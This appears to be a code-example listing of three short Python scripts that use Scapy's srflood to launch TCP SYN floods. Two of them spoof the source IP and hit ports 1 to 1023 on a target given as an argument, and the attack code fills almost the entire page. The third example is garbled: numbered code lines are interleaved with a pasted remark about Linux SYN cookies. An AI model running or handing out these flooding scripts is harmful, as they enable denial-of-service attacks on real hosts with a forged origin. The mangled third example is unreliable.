예제 #1
0
import sys
from scapy.all import TCP, IP, srflood

packet = IP(src="192.168.65.131", dst="192.168.65.1") / TCP(dport=80,
                                                            flags="S")
srflood(packet)
예제 #2
0
#!/usr/bin/python

import sys
from scapy.all import srflood, IP, TCP

if len(sys.argv) < 3:
    print sys.argv[0] + " <spoofed_source_ip> <target>"
    sys.exit(0)

packet = IP(src=sys.argv[1], dst=sys.argv[2]) / \
         TCP(dport=range(1,1024), flags="S")

srflood(packet, store=0)
예제 #3
0
1 #!/usr/bin/python 
Luckily nowadaysSYN floodingattacks are not such a big deal anymoreas they were a decade ago. On Linux you can activate SYN cookies by executingthe following:
echo 1 > /proc/sys/net/ipv4/tcp_syncookies


2 3 import sys 4 from scapy.all import srflood, IP, TCP 5 6 if len(sys.argv) < 3: 7 print sys.argv[0] + " <spoofed_source_ip> <target>" 8 sys.exit(0) 9 10 packet = IP(src=sys.argv[1], dst=sys.argv[2]) / \ 11 TCP(dport=range(1,1024), flags="S") 12 13 srflood(packet, store=0)